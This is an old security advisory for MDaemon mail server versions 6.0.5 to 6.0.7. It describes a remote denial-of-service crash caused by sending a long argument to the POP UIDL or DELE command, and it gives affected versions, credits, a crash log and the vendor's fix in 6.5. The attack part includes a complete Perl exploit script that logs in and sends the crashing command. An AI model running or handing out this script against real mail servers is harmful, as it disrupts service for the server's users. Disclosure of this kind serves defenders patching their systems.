|
|
|
|
| |
| MDaemon Server brings SMTP/POP/IMAP and MIME mail services commonplace on UNIX hosts and the Internet to Windows based servers and microcomputers. A vulnerability in the product allows remote attackers to cause the server to crash. |
| |
Credit:
The information has been provided by D4rkGr3y, Robert Feldbauer, Basil Hussain, and Karl Pietri.
|
| |
Vulnerable systems:
* MDaemon version 6.0.5
* MDaemon version 6.0.6
* MDaemon version 6.0.7
Immune systems:
* MDaemon version 3.1.2
* MDaemon version 5.0.7
* MDaemon version 6.5
It's possible to kill MDaemon by sending long arguments (32b and above) with DELE or UIDL commands. To do this u must have at least mail-account on vulnerable host.
Here the log of attack on local a MDaemon POP-server:
+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
271036.AA3656130MD0012@dark.ru>
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
UIDL 11111111111111111111111111111111
Connection to host lost...
Vendor response:
This has been fixed in 6.5 which will be released later today. If you are under valid upgrade protection you should get it for free.
Exploit:
#!/usr/bin/perl
#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "[vuln_host]";
$login = "[login]";
$pass = "[pass]";
$port = "110";
$data = "1";
$num = "32";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM)
or die "Couldn't connect: @!\n";
print $socket "USER $login\n";
print $socket "PASS $user\n";
print $socket "UIDL $buf\n";
close($socket);
#EOF
|
|
|
|
|
|
|
|
|
|
